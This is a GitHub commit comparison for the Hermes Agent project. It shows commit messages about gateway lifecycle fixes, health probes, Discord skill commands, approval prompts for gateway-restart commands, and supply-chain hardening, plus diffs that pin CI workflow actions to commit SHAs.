Compare commits


17 Commits

Author SHA1 Message Date
Shannon Sands bad9fe2452 add generic gateway startup readiness checks 2026-04-15 10:03:23 +10:00
Teknium 10494b42a1 feat(discord): register skills under /skill command group with category subcommands (#9909)
Instead of consuming one top-level slash command slot per skill (hitting the
100-command limit with ~26 built-ins + 74 skills), skills are now organized
under a single /skill group command with category-based subcommand groups:

  /skill creative ascii-art [args]
  /skill media gif-search [args]
  /skill mlops axolotl [args]

Discord supports 25 subcommand groups × 25 subcommands = 625 max skills,
well beyond the previous 74-slot ceiling.

Categories are derived from the skill directory structure:
- skills/creative/ascii-art/ → category 'creative'
- skills/mlops/training/axolotl/ → category 'mlops' (top-level parent)
- skills/dogfood/ → uncategorized (direct subcommand)

Changes:
- hermes_cli/commands.py: add discord_skill_commands_by_category() with
  category grouping, hub/disabled filtering, Discord limit enforcement
- gateway/platforms/discord.py: replace top-level skill registration with
  _register_skill_group() using app_commands.Group hierarchy
- tests: 7 new tests covering group creation, category grouping,
  uncategorized skills, hub exclusion, deep nesting, empty skills,
  and handler dispatch

Inspired by Discord community suggestion from bottium.
2026-04-14 16:27:02 -07:00
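The category rules in 10494b42a1 can be sketched as below. This is a minimal illustration, not the code in `hermes_cli/commands.py`. `skill_category` and `group_skills` are hypothetical names. The sketch also assumes that uncategorized skills and category groups share the same 25 top-level slots under `/skill`.

```python
from __future__ import annotations

from collections import defaultdict
from pathlib import PurePosixPath

# Limits quoted in the commit message: 25 subcommand groups, 25 subcommands each.
MAX_TOP_LEVEL = 25
MAX_PER_GROUP = 25


def skill_category(skill_dir: str, root: str = "skills") -> str | None:
    """Top-level directory under `root`, or None for a skill sitting directly in it."""
    parts = PurePosixPath(skill_dir).relative_to(root).parts
    return parts[0] if len(parts) > 1 else None


def group_skills(skill_dirs: list[str]) -> tuple[dict[str, list[str]], list[str]]:
    """Split skills into {category: [names]} plus a list of uncategorized names."""
    grouped: dict[str, list[str]] = defaultdict(list)
    uncategorized: list[str] = []
    for skill_dir in sorted(skill_dirs):
        name = PurePosixPath(skill_dir).name
        category = skill_category(skill_dir)
        if category is None:
            uncategorized.append(name)
        else:
            grouped[category].append(name)

    # Keep at most 25 categories, each trimmed to 25 subcommands.
    categories = sorted(grouped)[:MAX_TOP_LEVEL]
    limited = {c: grouped[c][:MAX_PER_GROUP] for c in categories}
    # Assumption: uncategorized subcommands use whatever top-level slots remain.
    free_slots = MAX_TOP_LEVEL - len(limited)
    return limited, uncategorized[:free_slots]
```

Using only the top-level parent keeps deep trees such as `skills/mlops/training/axolotl/` within Discord's two-level subcommand nesting.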
Teknium 039023f497 diag: log all hermes processes on unexpected gateway shutdown (#9905)
When the gateway receives SIGTERM/SIGINT, the shutdown handler now
runs 'ps aux' and logs every hermes/gateway-related process (excluding
itself). This will show in agent.log as:

  WARNING: Shutdown diagnostic — other hermes processes running:
    hermes  1234 ... hermes update --gateway
    hermes  5678 ... hermes gateway restart

This is the missing diagnostic for #5646 / #6666 — we can prove
the restarts are from systemctl but can't determine WHO issues the
systemctl command. Next time it happens, the agent.log will contain
the evidence (the process that sent the signal or called systemctl
should still be alive when the handler fires).
2026-04-14 16:26:36 -07:00
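The diagnostic in 039023f497 amounts to filtering `ps aux` output. The following is a rough sketch only; the function names are hypothetical. Matching is restricted to the COMMAND column so that unrelated processes owned by a user named `hermes` are not reported, which may differ from the actual handler.

```python
import os
import re
import subprocess

_HERMES_RE = re.compile(r"hermes|gateway", re.IGNORECASE)


def other_hermes_processes(ps_output: str, own_pid: int) -> list[str]:
    """Return `ps aux` lines whose command mentions hermes/gateway, minus our own PID."""
    matches = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        # ps aux columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        try:
            pid = int(fields[1])
        except ValueError:
            continue
        if pid != own_pid and _HERMES_RE.search(fields[10]):
            matches.append(line.strip())
    return matches


def snapshot_other_hermes_processes() -> list[str]:
    """Run `ps aux` and filter it; returns [] if ps is missing or hangs."""
    try:
        result = subprocess.run(["ps", "aux"], capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.SubprocessError):
        return []
    return other_hermes_processes(result.stdout, os.getpid())
```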
Teknium 6448e1da23 feat(zai): add GLM-5V-Turbo support for coding plan (#9907)
- Add glm-5v-turbo to OpenRouter, Nous, and native Z.AI model lists
- Add glm-5v context length entry (200K tokens) to model metadata
- Update Z.AI endpoint probe to try multiple candidate models per
  endpoint (glm-5.1, glm-5v-turbo, glm-4.7) — fixes detection for
  newer coding plan accounts that lack older models
- Add zai to _PROVIDER_VISION_MODELS so auxiliary vision tasks
  (vision_analyze, browser screenshots) route through 5v

Fixes #9888
2026-04-14 16:26:01 -07:00
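The multi-candidate probe in 6448e1da23 can be pictured as a nested loop over endpoints and models. This is a sketch under assumptions. `detect_zai_endpoint` is a hypothetical name, and `probe` stands in for whatever request the real code sends, for example a minimal chat completion. The model order follows the commit message.

```python
from __future__ import annotations

from typing import Callable, Iterable

# Candidate models listed in the commit message, tried in this order.
CANDIDATE_MODELS = ("glm-5.1", "glm-5v-turbo", "glm-4.7")


def detect_zai_endpoint(
    endpoints: Iterable[str],
    probe: Callable[[str, str], bool],
    models: Iterable[str] = CANDIDATE_MODELS,
) -> tuple[str, str] | None:
    """Return the first (endpoint, model) pair the probe accepts, or None."""
    models = tuple(models)
    for endpoint in endpoints:
        # Trying several models per endpoint keeps detection working for
        # accounts that only have newer models enabled.
        for model in models:
            if probe(endpoint, model):
                return endpoint, model
    return None
```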
Teknium 1e5e1e822b fix: ESC cancels secret/sudo prompts, clearer skip messaging (#9902)
- Add ESC key binding (eager) for secret_state and sudo_state modal
  prompts — fires immediately, same behavior as Ctrl+C cancel
- Update placeholder text: 'Enter to submit · ESC to skip' (was
  'Enter to skip' which was confusing — Enter on empty looked like
  submitting nothing rather than intentionally skipping)
- Update widget body text: 'ESC or Ctrl+C to skip'
- Change feedback message from 'Secret entry cancelled' to 'Secret
  entry skipped' — more accurate for the action taken
- getpass fallback prompt also updated for non-TUI mode
2026-04-14 16:11:37 -07:00
Teknium 55ce76b372 feat: add architecture-diagram skill (Cocoon AI port) (#9906)
Port of Cocoon AI's architecture-diagram-generator (MIT) as a Hermes skill.
Generates professional dark-themed system architecture diagrams as standalone
HTML/SVG files. Self-contained output, no dependencies.

- SKILL.md with design system specs, color palette, layout rules
- HTML template with all component types, arrow styles, legend examples
- Fits alongside excalidraw in creative/ category

Source: https://github.com/Cocoon-AI/architecture-diagram-generator
2026-04-14 16:10:18 -07:00
Teknium 1525624904 fix: block agent from self-destructing gateway via terminal (#6666)
Add dangerous command patterns that require approval when the agent
tries to run gateway lifecycle commands via the terminal tool:

- hermes gateway stop/restart — kills all running agents mid-work
- hermes update — pulls code and restarts the gateway
- systemctl restart/stop (with optional flags like --user)

These patterns fire the approval prompt so the user must explicitly
approve before the agent can kill its own gateway process. In YOLO
mode, the commands run without approval (by design — YOLO means the
user accepts all risks).

Also fixes the existing systemctl pattern to handle flags between
the command and action (e.g. 'systemctl --user restart' was previously
undetected because the regex expected the action immediately after
'systemctl').

Root cause: issue #6666 reported agents running 'hermes gateway
restart' via terminal, killing the gateway process mid-agent-loop.
The user sees the agent suddenly stop responding with no explanation.
Combined with the SIGTERM auto-recovery from PR #9875, the gateway
now both prevents accidental self-destruction AND recovers if it
happens anyway.

Test plan:
- Updated test_systemctl_restart_not_flagged → test_systemctl_restart_flagged
- All 119 approval tests pass
- E2E verified: hermes gateway restart, hermes update, systemctl
  --user restart all detected; hermes gateway status, systemctl
  status remain safe
2026-04-14 15:43:31 -07:00
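The approval rules from 1525624904 could be expressed roughly as the regexes below. These patterns are hypothetical illustrations written for this note, not the project's actual pattern list. The key detail is the optional flag run between `systemctl` and the action, which is what lets `systemctl --user restart` match.

```python
from __future__ import annotations

import re

DANGEROUS_PATTERNS = [
    (re.compile(r"\bhermes\s+gateway\s+(?:stop|restart)\b"), "stops or restarts the gateway"),
    (re.compile(r"\bhermes\s+update\b"), "pulls code and restarts the gateway"),
    # Zero or more flags (e.g. --user, -q, --host=x) may sit before the action.
    (re.compile(r"\bsystemctl\s+(?:-{1,2}[\w-]+(?:=\S+)?\s+)*(?:restart|stop)\b"),
     "systemctl restart/stop"),
]


def needs_approval(command: str) -> str | None:
    """Return the reason a command needs approval, or None if it looks safe."""
    for pattern, reason in DANGEROUS_PATTERNS:
        if pattern.search(command):
            return reason
    return None
```

Read-only commands such as `hermes gateway status` and `systemctl status` fall through every pattern and return `None`.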
Teknium 353b5bacbd test: add tests for /health/detailed endpoint and gateway health probe
- TestHealthDetailedEndpoint: 3 tests for the new API server endpoint
  (returns runtime data, handles missing status, no auth required)
- TestProbeGatewayHealth: 5 tests for _probe_gateway_health()
  (URL normalization, successful/failed probes, fallback chain)
- TestStatusRemoteGateway: 4 tests for /api/status remote fallback
  (remote probe triggers, skipped when local PID found, null PID handling)
2026-04-14 15:41:30 -07:00
Hermes Agent 139a5e37a4 docs(docker): add dashboard section, expose API port, update Compose example
- Running in gateway mode: expose port 8642 for the API server and
  health endpoint, with a note on when it's needed.
- New 'Running the dashboard' section: docker run command with
  GATEWAY_HEALTH_URL and env var reference table.
- Docker Compose example: updated to include both gateway and dashboard
  services with internal network connectivity (hermes-net), so the
  dashboard probes the gateway via http://hermes:8642.
- Concurrent access warning: clarified that running a read-only
  dashboard alongside the gateway is safe.
2026-04-14 15:41:30 -07:00
Hermes Agent 673acf22ae fix: override stale 'stopped' state when health probe confirms gateway alive
When the gateway responds to the health probe but the local
gateway_state.json has a stale 'stopped' state (common in cross-container
setups where the file was written before the gateway restarted), the
dashboard would show 'Running (remote)' but with a 'Stopped' badge.

Now if the HTTP probe succeeded (remote_health_body is not None) and
gateway_state is 'stopped' or None, override it to 'running'. Also
handles the no-shared-volume case where runtime is None entirely.
2026-04-14 15:41:30 -07:00
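The override rule in 673acf22ae reduces to a small decision function. This is a sketch; `effective_gateway_state` is a hypothetical name, while `runtime`, `remote_health_body` and `gateway_state` follow the commit text.

```python
from __future__ import annotations

from typing import Any


def effective_gateway_state(
    runtime: dict[str, Any] | None,
    remote_health_body: dict[str, Any] | None,
) -> str | None:
    """Prefer a successful HTTP probe over a possibly stale local state file."""
    # runtime is None when the dashboard shares no volume with the gateway.
    state = (runtime or {}).get("gateway_state")
    if remote_health_body is not None and state in ("stopped", None):
        return "running"
    return state
```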
Hermes Agent 6ed682f111 fix: normalise GATEWAY_HEALTH_URL to base URL before probing
The probe was appending '/detailed' to whatever URL was provided,
so GATEWAY_HEALTH_URL=http://host:8642 would try http://host:8642/detailed
and then http://host:8642, neither of which is a valid route.

Now strips any trailing /health or /health/detailed from the env var
and always probes {base}/health/detailed then {base}/health.
Accepts bare base URL, /health, or /health/detailed forms.
2026-04-14 15:41:30 -07:00
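The normalisation in 6ed682f111 can be sketched as follows. `health_probe_urls` is a hypothetical helper. It checks the longer `/health/detailed` suffix first so that it is not only partially stripped.

```python
def health_probe_urls(raw_url: str) -> list[str]:
    """Reduce GATEWAY_HEALTH_URL to its base URL and return the probe order."""
    base = raw_url.strip().rstrip("/")
    # Longest suffix first, so '/health/detailed' is not left as '/health'.
    for suffix in ("/health/detailed", "/health"):
        if base.endswith(suffix):
            base = base[: -len(suffix)]
            break
    return [f"{base}/health/detailed", f"{base}/health"]
```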
Hermes Agent 45595f4805 feat(dashboard): add HTTP health probe for cross-container gateway detection
The dashboard's gateway status detection relied solely on local PID checks
(os.kill + /proc), which fails when the gateway runs in a separate container.

Changes:
- web_server.py: Add _probe_gateway_health() that queries the gateway's HTTP
  /health/detailed endpoint when the local PID check fails. Activated by
  setting the GATEWAY_HEALTH_URL env var (e.g. http://gateway:8642/health).
  Falls back to standard PID check when the env var is not set.
- api_server.py: Add GET /health/detailed endpoint that returns full gateway
  state (platforms, gateway_state, active_agents, pid, etc.) without auth.
  The existing GET /health remains unchanged for backwards compatibility.
- StatusPage.tsx: Handle the case where gateway_pid is null but the gateway
  is running remotely, displaying 'Running (remote)' instead of 'PID null'.

Environment variables:
- GATEWAY_HEALTH_URL: URL of the gateway health endpoint (e.g.
  http://gateway-container:8642/health). Unset = local PID check only.
- GATEWAY_HEALTH_TIMEOUT: Probe timeout in seconds (default: 3).
2026-04-14 15:41:30 -07:00
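A standard-library sketch of the probe described in 45595f4805 follows. It is not the code in `web_server.py`, and the function names are hypothetical. It takes an explicit list of candidate URLs and returns the first JSON body that loads. Returning `None` signals the caller to fall back to the local PID check. The timeout comes from GATEWAY_HEALTH_TIMEOUT with the documented default of 3 seconds.

```python
from __future__ import annotations

import json
import os
import urllib.request
from typing import Any, Callable, Iterable


def fetch_json(url: str, timeout: float) -> Any:
    """GET `url` and decode its JSON body; raises OSError or ValueError on failure."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def probe_timeout() -> float:
    """GATEWAY_HEALTH_TIMEOUT in seconds; 3 when unset or unparseable."""
    try:
        return float(os.environ.get("GATEWAY_HEALTH_TIMEOUT", "3"))
    except ValueError:
        return 3.0


def probe_gateway_health(
    urls: Iterable[str],
    timeout: float | None = None,
    fetch: Callable[[str, float], Any] = fetch_json,
) -> Any | None:
    """Return the first successful JSON body, or None if every URL fails."""
    if timeout is None:
        timeout = probe_timeout()
    for url in urls:
        try:
            return fetch(url, timeout)
        except (OSError, ValueError):
            # Connection refused, timeout, HTTP error status, or invalid JSON.
            continue
    return None
```

The injectable `fetch` parameter is only there to make the fallback order easy to test without a running gateway.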
Teknium 397386cae2 fix: gateway auto-recovers from unexpected SIGTERM via systemd (#5646)
Root cause: when the gateway received SIGTERM (from hermes update,
external kill, WSL2 runtime, etc.), it exited with status 0. systemd's
Restart=on-failure only restarts on non-zero exit, so the gateway
stayed dead permanently. Users had to manually restart.

Fix 1: Signal-initiated shutdown exits non-zero
When SIGTERM/SIGINT is received and no restart was requested (via
/restart, /update, or SIGUSR1), start_gateway() returns False which
causes sys.exit(1). systemd sees a failure exit and auto-restarts
after RestartSec=30.

This is safe because systemctl stop tracks its own stop-requested
state independently of exit code — Restart= never fires for a
deliberate stop, regardless of exit code.

Also logs 'Received SIGTERM/SIGINT — initiating shutdown' so the
cause of unexpected shutdowns is visible in agent.log.

Fix 2: PID file ownership guard
remove_pid_file() now checks that the PID file belongs to the current
process before removing it. During --replace handoffs, the old
process's atexit handler could fire AFTER the new process wrote its
PID file, deleting the new record. This left the gateway running but
invisible to get_running_pid(), causing 'Another gateway already
running' errors on next restart.

Test plan:
- All restart drain tests pass (13)
- All gateway service tests pass (84)
- All update gateway restart tests pass (34)
2026-04-14 15:35:58 -07:00
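Both fixes in 397386cae2 can be sketched in a few lines. This assumes, for illustration only, that the PID file holds a bare integer. The real file format and the function names `remove_pid_file`/`exit_code_for_shutdown` here may not match the project.

```python
import os
from pathlib import Path


def exit_code_for_shutdown(signal_received: bool, restart_requested: bool) -> int:
    """Non-zero after an unrequested SIGTERM/SIGINT so Restart=on-failure fires."""
    return 1 if signal_received and not restart_requested else 0


def remove_pid_file(pid_file: Path) -> bool:
    """Delete pid_file only if it records this process's PID."""
    try:
        recorded = int(pid_file.read_text().strip())
    except (FileNotFoundError, ValueError):
        return False
    if recorded != os.getpid():
        # Another process (e.g. the new gateway after --replace) owns the file.
        return False
    pid_file.unlink(missing_ok=True)
    return True
```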
Teknium eed891f1bb security: supply chain hardening — CI pinning, dep pinning, and code fixes (#9801)
CI/CD Hardening:
- Pin all 12 GitHub Actions to full commit SHAs (was mutable @vN tags)
- Add explicit permissions: {contents: read} to 4 workflows
- Pin CI pip installs to exact versions (pyyaml==6.0.2, httpx==0.28.1)
- Extend supply-chain-audit.yml to scan workflow, Dockerfile, dependency
  manifest, and Actions version changes

Dependency Pinning:
- Pin git-based Python deps to commit SHAs (atroposlib, tinker, yc-bench)
- Pin WhatsApp Baileys from mutable branch to commit SHA

Tool Registry:
- Reject tool name shadowing from different tool families (plugins/MCP
  cannot overwrite built-in tools). MCP-to-MCP overwrites still allowed.

MCP Security:
- Add tool description content scanning for prompt injection patterns
- Log detailed change diff on dynamic tool refresh at WARNING level

Skill Manager:
- Fix dangerous verdict bug: agent-created skills with dangerous
  findings were silently allowed (ask->None->allow). Now blocked.
2026-04-14 14:23:37 -07:00
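The tool-registry rule in eed891f1bb (no cross-family shadowing, same-family overwrites allowed) might look like this. It is a hypothetical sketch: `ToolEntry`, `ToolRegistry` and the family labels `"builtin"`, `"plugin"` and `"mcp"` are assumptions, not the project's types.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class ToolEntry:
    name: str
    family: str  # hypothetical labels: "builtin", "plugin", "mcp"


class ToolRegistry:
    """Registry that refuses to let one tool family shadow another's names."""

    def __init__(self) -> None:
        self._tools: dict[str, ToolEntry] = {}

    def register(self, entry: ToolEntry) -> bool:
        existing = self._tools.get(entry.name)
        if existing is not None and existing.family != entry.family:
            # e.g. an MCP or plugin tool trying to replace a built-in one.
            return False
        # New name, or a same-family overwrite such as an MCP refresh.
        self._tools[entry.name] = entry
        return True

    def get(self, name: str) -> ToolEntry | None:
        return self._tools.get(name)
```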
Teknium 9bbf7659e9 chore: add Roy-oss1 to AUTHOR_MAP 2026-04-14 14:22:11 -07:00
Roy-oss1 1aa76620d4 fix(feishu): keep approval clicks synchronized with callback card state
Feishu approval clicks need the resolved card to come back from the
synchronous callback path itself. Leaving approval resolution to the
generic asynchronous card-action flow made button feedback depend on
later loop work instead of the callback response the client is waiting
for.

Change-Id: I574997cbbcaa097fdba759b47367e28d1b56b040
Constraint: Feishu card-action callbacks must acknowledge quickly and reflect final approval state from the callback response path
Rejected: Keep approval handling on the generic async card-action route | leaves card state synchronization vulnerable to callback timing and follow-up update ordering
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Keep approval callback response construction separate from async queue unblocking unless Feishu callback semantics change
Tested: pytest tests/gateway/test_feishu.py tests/gateway/test_feishu_approval_buttons.py tests/gateway/test_approve_deny_commands.py tests/gateway/test_slack_approval_buttons.py tests/gateway/test_telegram_approval_buttons.py -q
Not-tested: Live Feishu workspace end-to-end callback rendering
2026-04-14 14:22:11 -07:00
Teknium fa8c448f7d fix: notify active sessions on gateway shutdown + update health check
Three fixes for gateway lifecycle stability:

1. Notify active sessions before shutdown (#new)
   When the gateway receives SIGTERM or /restart, it now sends a
   notification to every chat with an active agent BEFORE starting
   the drain. Users see:
   - Shutdown: 'Gateway shutting down — your task will be interrupted.'
   - Restart: 'Gateway restarting — use /retry after restart to continue.'
   Deduplicates per-chat so group sessions with multiple users get
   one notification. Best-effort: send failures are logged and swallowed.

2. Skip .clean_shutdown marker when drain timed out
   Previously, a graceful SIGTERM always wrote .clean_shutdown, even if
   agents were force-interrupted when the drain timed out. This meant
   the next startup skipped session suspension, leaving interrupted
   sessions in a broken state (trailing tool response, no final message).
   Now the marker is only written if the drain completed without timeout,
   so interrupted sessions get properly suspended on next startup.

3. Post-restart health check for hermes update (#6631)
   cmd_update() now verifies the gateway actually survived after
   systemctl restart (sleep 3s + is-active check). If the service
   crashed immediately, it retries once. If still dead, prints
   actionable diagnostics (journalctl command, manual restart hint).

Also closes #8104 — already fixed on main (the /restart handler
correctly detects systemd via INVOCATION_ID and uses via_service=True).

Test plan:
- 6 new tests for shutdown notifications (dedup, restart vs shutdown
  messaging, sentinel filtering, send failure resilience)
- Existing restart drain + update tests pass (47 total)
2026-04-14 14:21:57 -07:00
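The deduplicated, best-effort notification from fa8c448f7d can be sketched with asyncio. This assumes the caller passes one chat ID per active session and picks the shutdown or restart wording itself. `notify_active_sessions` and the `send` callback are hypothetical stand-ins for the platform adapters.

```python
from __future__ import annotations

import asyncio
import logging
from typing import Awaitable, Callable, Iterable

logger = logging.getLogger(__name__)


async def notify_active_sessions(
    chat_ids: Iterable[str],
    message: str,
    send: Callable[[str, str], Awaitable[None]],
) -> int:
    """Send `message` once per chat; failures are logged, never raised."""
    delivered = 0
    # dict.fromkeys dedupes while keeping first-seen order, so a group chat
    # with several active sessions receives a single notice.
    for chat_id in dict.fromkeys(chat_ids):
        try:
            await send(chat_id, message)
            delivered += 1
        except Exception:
            logger.warning("shutdown notice to %s failed", chat_id, exc_info=True)
    return delivered


async def _demo() -> None:
    async def send(chat_id: str, text: str) -> None:
        print(f"-> {chat_id}: {text}")

    await notify_active_sessions(["tg:1", "tg:1", "discord:9"], "Gateway restarting", send)


if __name__ == "__main__":
    asyncio.run(_demo())
```

Swallowing send errors keeps one unreachable chat from blocking the drain that follows.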
53 changed files with 2745 additions and 444 deletions
+4 -1
@@ -9,11 +9,14 @@ on:
- '**/*.py'
- '.github/workflows/contributor-check.yml'
permissions:
contents: read
jobs:
check-attribution:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
fetch-depth: 0 # Full history needed for git log
+6 -6
@@ -28,20 +28,20 @@ jobs:
name: github-pages
url: ${{ steps.deploy.outputs.page_url }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/setup-node@v4
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: 20
cache: npm
cache-dependency-path: website/package-lock.json
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
- name: Install PyYAML for skill extraction
run: pip install pyyaml httpx
run: pip install pyyaml==6.0.2 httpx==0.28.1
- name: Extract skill metadata for dashboard
run: python3 website/scripts/extract-skills.py
@@ -73,10 +73,10 @@ jobs:
echo "hermes-agent.nousresearch.com" > _site/CNAME
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3
with:
path: _site
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@v4
uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4
+7 -7
@@ -23,21 +23,21 @@ jobs:
timeout-minutes: 60
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
submodules: recursive
- name: Set up QEMU
uses: docker/setup-qemu-action@v3
uses: docker/setup-qemu-action@c7c53464625b32c7a7e944ae62b3e17d2b600130 # v3
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v3
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
# Build amd64 only so we can `load` the image for smoke testing.
# `load: true` cannot export a multi-arch manifest to the local daemon.
# The multi-arch build follows on push to main / release.
- name: Build image (amd64, smoke test)
uses: docker/build-push-action@v6
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
file: Dockerfile
@@ -56,14 +56,14 @@ jobs:
- name: Log in to Docker Hub
if: github.event_name == 'push' && github.ref == 'refs/heads/main' || github.event_name == 'release'
uses: docker/login-action@v3
uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: Push multi-arch image (main branch)
if: github.event_name == 'push' && github.ref == 'refs/heads/main'
uses: docker/build-push-action@v6
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
file: Dockerfile
@@ -75,7 +75,7 @@ jobs:
- name: Push multi-arch image (release)
if: github.event_name == 'release'
uses: docker/build-push-action@v6
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
file: Dockerfile
+6 -3
@@ -7,13 +7,16 @@ on:
- '.github/workflows/docs-site-checks.yml'
workflow_dispatch:
permissions:
contents: read
jobs:
docs-site-checks:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/setup-node@v4
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: 20
cache: npm
@@ -23,7 +26,7 @@ jobs:
run: npm ci
working-directory: website
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
+4 -1
@@ -14,6 +14,9 @@ on:
- 'run_agent.py'
- 'acp_adapter/**'
permissions:
contents: read
concurrency:
group: nix-${{ github.ref }}
cancel-in-progress: true
@@ -26,7 +29,7 @@ jobs:
runs-on: ${{ matrix.os }}
timeout-minutes: 30
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: DeterminateSystems/nix-installer-action@ef8a148080ab6020fd15196c2084a2eea5ff2d25 # v22
- uses: DeterminateSystems/magic-nix-cache-action@565684385bcd71bad329742eefe8d12f2e765b39 # v13
- name: Check flake
+11 -11
@@ -20,14 +20,14 @@ jobs:
if: github.repository == 'NousResearch/hermes-agent'
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
- name: Install dependencies
run: pip install httpx pyyaml
run: pip install httpx==0.28.1 pyyaml==6.0.2
- name: Build skills index
env:
@@ -35,7 +35,7 @@ jobs:
run: python scripts/build_skills_index.py
- name: Upload index artifact
uses: actions/upload-artifact@v4
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
with:
name: skills-index
path: website/static/api/skills-index.json
@@ -53,25 +53,25 @@ jobs:
# Only deploy on schedule or manual trigger (not on every push to the script)
if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch'
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/download-artifact@v4
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: skills-index
path: website/static/api/
- uses: actions/setup-node@v4
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: 20
cache: npm
cache-dependency-path: website/package-lock.json
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
- name: Install PyYAML for skill extraction
run: pip install pyyaml
run: pip install pyyaml==6.0.2
- name: Extract skill metadata for dashboard
run: python3 website/scripts/extract-skills.py
@@ -92,10 +92,10 @@ jobs:
echo "hermes-agent.nousresearch.com" > _site/CNAME
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3
with:
path: _site
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@v4
uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4
+57 -1
@@ -14,7 +14,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
fetch-depth: 0
@@ -149,6 +149,62 @@ jobs:
"
fi
# --- CI/CD workflow files modified ---
WORKFLOW_HITS=$(git diff --name-only "$BASE".."$HEAD" | grep -E '\.github/workflows/.*\.ya?ml$' || true)
if [ -n "$WORKFLOW_HITS" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: CI/CD workflow files modified
Changes to workflow files can alter build pipelines, inject steps, or modify permissions. Verify no unauthorized actions or secrets access were added.
**Files:**
\`\`\`
${WORKFLOW_HITS}
\`\`\`
"
fi
# --- Dockerfile / container build files modified ---
DOCKER_HITS=$(git diff --name-only "$BASE".."$HEAD" | grep -iE '(Dockerfile|\.dockerignore|docker-compose)' || true)
if [ -n "$DOCKER_HITS" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: Container build files modified
Changes to Dockerfiles or compose files can alter base images, add build steps, or expose ports. Verify base image pins and build commands.
**Files:**
\`\`\`
${DOCKER_HITS}
\`\`\`
"
fi
# --- Dependency manifest files modified ---
DEP_HITS=$(git diff --name-only "$BASE".."$HEAD" | grep -E '(pyproject\.toml|requirements.*\.txt|package\.json|Gemfile|go\.mod|Cargo\.toml)$' || true)
if [ -n "$DEP_HITS" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: Dependency manifest files modified
Changes to dependency files can introduce new packages or change version pins. Verify all dependency changes are intentional and from trusted sources.
**Files:**
\`\`\`
${DEP_HITS}
\`\`\`
"
fi
# --- GitHub Actions version unpinning (mutable tags instead of SHAs) ---
ACTIONS_UNPIN=$(echo "$DIFF" | grep -n '^\+' | grep 'uses:' | grep -v '#' | grep -E '@v[0-9]' | head -10 || true)
if [ -n "$ACTIONS_UNPIN" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: GitHub Actions with mutable version tags
Actions should be pinned to full commit SHAs (not \`@v4\`, \`@v5\`). Mutable tags can be retargeted silently if a maintainer account is compromised.
**Matches:**
\`\`\`
${ACTIONS_UNPIN}
\`\`\`
"
fi
# --- Output results ---
if [ -n "$FINDINGS" ]; then
echo "found=true" >> "$GITHUB_OUTPUT"
+7 -4
@@ -6,6 +6,9 @@ on:
pull_request:
branches: [main]
permissions:
contents: read
# Cancel in-progress runs for the same PR/branch
concurrency:
group: tests-${{ github.ref }}
@@ -17,13 +20,13 @@ jobs:
